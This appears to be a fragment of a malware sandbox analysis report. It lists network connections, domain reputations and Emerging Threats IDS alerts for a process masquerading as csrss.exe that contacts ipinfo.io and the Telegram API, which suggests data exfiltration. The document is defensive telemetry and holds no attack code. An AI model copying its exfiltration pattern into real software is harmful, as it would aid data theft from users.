4328 | csrss.exe | 149.154.167.220:443 | api.telegram.org | Telegram Messenger LLP | GB | malicious |
Domain | IP | Reputation |
---|---|---|
watson.microsoft.com |
| whitelisted |
ipinfo.io |
| shared |
api.telegram.org |
| shared |
PID | Process | Class | Message |
---|---|---|---|
35476 | AppLaunch.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
4664 | AppLaunch.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
4328 | csrss.exe | A Network Trojan was detected | ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io) |
4328 | csrss.exe | Potential Corporate Privacy Violation | ET POLICY Possible External IP Lookup SSL Cert Observed (ipinfo.io) |
— | — | Misc activity | ET INFO Telegram API Domain in DNS Lookup |
4328 | csrss.exe | Misc activity | ET INFO Observed Telegram API Domain (api .telegram .org in TLS SNI) |
4328 | csrss.exe | Misc activity | ET POLICY Telegram API Certificate Observed |